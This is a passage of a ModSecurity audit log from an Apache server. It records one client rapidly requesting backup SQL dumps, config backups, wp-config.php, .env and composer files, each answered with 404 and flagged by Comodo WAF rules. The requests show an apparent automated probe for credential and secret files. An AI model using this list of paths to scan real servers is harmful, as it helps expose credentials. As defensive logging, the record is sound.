"198.71.51.75"] [uri "/backup/access.log"] [unique_id "aFCr9QJ4p5Cdblnjra533wAAAAI"] Stopwatch: 1750117365666958 3291 (- - -) Stopwatch2: 1750117365666958 3291; combined=2016, p1=358, p2=1554, p3=21, p4=27, p5=56, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5334c31-Z-- --8e79282e-A-- [17/Jun/2025:05:12:45.891818 +0530] aFCr9YoVQnPDyHnl9oPTmgAAAAY 185.177.72.204 33286 127.0.0.1 7080 --8e79282e-B-- GET /backup/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8e79282e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e79282e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/app.js.bak"] [unique_id "aFCr9YoVQnPDyHnl9oPTmgAAAAY"] Stopwatch: 1750117365888243 3626 (- - -) Stopwatch2: 1750117365888243 3626; combined=2224, p1=381, p2=1742, p3=22, p4=27, p5=52, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e79282e-Z-- --de1ad860-A-- [17/Jun/2025:05:12:46.001381 +0530] aFCr9VJfblPUQiSn5r2RjwAAAAA 185.177.72.204 33302 127.0.0.1 7080 --de1ad860-B-- GET /backup/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --de1ad860-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --de1ad860-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/backup.sql"] [unique_id "aFCr9VJfblPUQiSn5r2RjwAAAAA"] Stopwatch: 1750117365998968 2469 (- - -) Stopwatch2: 1750117365998968 2469; combined=1562, p1=302, p2=1183, p3=14, p4=17, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de1ad860-Z-- --3d57fb18-A-- [17/Jun/2025:05:12:46.663237 +0530] aFCr9lJfblPUQiSn5r2RkAAAAAA 185.177.72.204 33338 127.0.0.1 7080 --3d57fb18-B-- GET /backup/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3d57fb18-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d57fb18-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/config.php.bak"] [unique_id "aFCr9lJfblPUQiSn5r2RkAAAAAA"] Stopwatch: 1750117366659922 3360 (- - -) Stopwatch2: 1750117366659922 3360; combined=2047, p1=384, p2=1557, p3=21, p4=27, p5=58, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3d57fb18-Z-- --d4f02609-A-- [17/Jun/2025:05:12:46.883914 +0530] aFCr9grsPejRtmHkrKLgegAAAAE 185.177.72.204 33352 127.0.0.1 7080 --d4f02609-B-- GET /backup/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d4f02609-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4f02609-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/db.sql"] [unique_id "aFCr9grsPejRtmHkrKLgegAAAAE"] Stopwatch: 1750117366881012 2952 (- - -) Stopwatch2: 1750117366881012 2952; combined=1703, p1=324, p2=1284, p3=17, p4=22, p5=56, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4f02609-Z-- --0baad118-A-- [17/Jun/2025:05:12:47.104718 +0530] aFCr9wJ4p5Cdblnjra534QAAAAI 185.177.72.204 33362 127.0.0.1 7080 --0baad118-B-- GET /backup/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0baad118-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0baad118-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/debug.log"] [unique_id "aFCr9wJ4p5Cdblnjra534QAAAAI"] Stopwatch: 1750117367101067 3695 (- - -) Stopwatch2: 1750117367101067 3695; combined=2409, p1=330, p2=1979, p3=23, p4=26, p5=51, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0baad118-Z-- --aaee1918-A-- [17/Jun/2025:05:12:47.324247 +0530] aFCr91JfblPUQiSn5r2RkQAAAAA 185.177.72.204 33382 127.0.0.1 7080 --aaee1918-B-- GET /backup/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aaee1918-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaee1918-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/dump.sql"] [unique_id "aFCr91JfblPUQiSn5r2RkQAAAAA"] Stopwatch: 1750117367321481 2815 (- - -) Stopwatch2: 1750117367321481 2815; combined=1655, p1=338, p2=1225, p3=17, p4=23, p5=52, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aaee1918-Z-- --87aedc56-A-- [17/Jun/2025:05:12:47.544301 +0530] aFCr9-TJOk1gXj_qIh4X3QAAAAQ 185.177.72.204 33402 127.0.0.1 7080 --87aedc56-B-- GET /backup/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87aedc56-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --87aedc56-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/error.log"] [unique_id "aFCr9-TJOk1gXj_qIh4X3QAAAAQ"] Stopwatch: 1750117367541374 2976 (- - -) Stopwatch2: 1750117367541374 2976; combined=1780, p1=332, p2=1335, p3=18, p4=24, p5=70, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87aedc56-Z-- --8eb40a1c-A-- [17/Jun/2025:05:12:47.875261 +0530] aFCr95VkCcfT-Z8NQYzE7AAAAAc 185.177.72.204 33432 127.0.0.1 7080 --8eb40a1c-B-- GET /backup/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8eb40a1c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eb40a1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/logs/error.log"] [unique_id "aFCr95VkCcfT-Z8NQYzE7AAAAAc"] Stopwatch: 1750117367871928 3398 (- - -) Stopwatch2: 1750117367871928 3398; combined=2200, p1=327, p2=1749, p3=21, p4=26, p5=77, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8eb40a1c-Z-- --161abb4c-A-- [17/Jun/2025:05:12:48.426871 +0530] aFCr-JVkCcfT-Z8NQYzE7QAAAAc 185.177.72.204 33472 127.0.0.1 7080 --161abb4c-B-- GET /backup/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --161abb4c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --161abb4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/site.conf"] [unique_id "aFCr-JVkCcfT-Z8NQYzE7QAAAAc"] Stopwatch: 1750117368423781 3134 (- - -) Stopwatch2: 1750117368423781 3134; combined=1933, p1=338, p2=1496, p3=20, p4=27, p5=52, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --161abb4c-Z-- --c1c66503-A-- [17/Jun/2025:05:12:48.537252 +0530] aFCr-JWbMc1Q3J_M-mhInQAAAAo 185.177.72.204 33478 127.0.0.1 7080 --c1c66503-B-- GET /backup/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c1c66503-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c66503-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/site.sql"] [unique_id "aFCr-JWbMc1Q3J_M-mhInQAAAAo"] Stopwatch: 1750117368534154 3142 (- - -) Stopwatch2: 1750117368534154 3142; combined=1973, p1=365, p2=1524, p3=13, p4=21, p5=50, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1c66503-Z-- --b9b7bc3c-A-- [17/Jun/2025:05:12:48.647365 +0530] aFCr-FJfblPUQiSn5r2RkwAAAAA 185.177.72.204 33490 127.0.0.1 7080 --b9b7bc3c-B-- GET /backup/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b9b7bc3c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b7bc3c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/wp-config.php"] [unique_id "aFCr-FJfblPUQiSn5r2RkwAAAAA"] Stopwatch: 1750117368644304 3115 (- - -) Stopwatch2: 1750117368644304 3115; combined=1897, p1=367, p2=1435, p3=19, p4=25, p5=51, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9b7bc3c-Z-- --68d37716-A-- [17/Jun/2025:05:12:48.757386 +0530] aFCr-AGFf516NUzzD0B3UAAAAAg 185.177.72.204 33502 127.0.0.1 7080 --68d37716-B-- GET /backup/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --68d37716-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d37716-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backup/wp-config.php.old"] [unique_id "aFCr-AGFf516NUzzD0B3UAAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/backup/wp-config.php.old"] [unique_id "aFCr-AGFf516NUzzD0B3UAAAAAg"] Stopwatch: 1750117368754396 3032 (- - -) Stopwatch2: 1750117368754396 3032; combined=1856, p1=382, p2=1344, p3=25, p4=27, p5=78, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68d37716-Z-- --0af7d159-A-- [17/Jun/2025:05:12:48.978110 +0530] aFCr-IoVQnPDyHnl9oPTngAAAAY 185.177.72.204 33530 127.0.0.1 7080 --0af7d159-B-- GET /backups/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0af7d159-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0af7d159-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/backups/.env"] [unique_id "aFCr-IoVQnPDyHnl9oPTngAAAAY"] Stopwatch: 1750117368974848 3340 (- - -) Stopwatch2: 1750117368974848 3340; combined=2012, p1=409, p2=1507, p3=21, p4=25, p5=50, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0af7d159-Z-- --c351b869-A-- [17/Jun/2025:05:12:49.308289 +0530] aFCr-VJfblPUQiSn5r2RlAAAAAA 185.177.72.204 33562 127.0.0.1 7080 --c351b869-B-- GET /beta/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c351b869-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c351b869-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/beta/db.sql"] [unique_id "aFCr-VJfblPUQiSn5r2RlAAAAAA"] Stopwatch: 1750117369305455 2876 (- - -) Stopwatch2: 1750117369305455 2876; combined=1707, p1=335, p2=1242, p3=18, p4=22, p5=90, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c351b869-Z-- --584f016b-A-- [17/Jun/2025:05:12:50.965033 +0530] aFCr-grsPejRtmHkrKLgfwAAAAE 185.177.72.204 46464 127.0.0.1 7080 --584f016b-B-- GET /composer.json HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --584f016b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --584f016b-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/composer.json"] [unique_id "aFCr-grsPejRtmHkrKLgfwAAAAE"] Stopwatch: 1750117370962167 2909 (- - -) Stopwatch2: 1750117370962167 2909; combined=1708, p1=405, p2=1209, p3=17, p4=23, p5=53, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --584f016b-Z-- --c0b74626-A-- [17/Jun/2025:05:12:51.075240 +0530] aFCr--TJOk1gXj_qIh4X4QAAAAQ 185.177.72.204 46466 127.0.0.1 7080 --c0b74626-B-- GET /composer.lock HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0b74626-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b74626-H-- Message: Warning. Matched phrase "/composer.lock" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/composer.lock"] [unique_id "aFCr--TJOk1gXj_qIh4X4QAAAAQ"] Stopwatch: 1750117371072347 2947 (- - -) Stopwatch2: 1750117371072347 2947; combined=1699, p1=405, 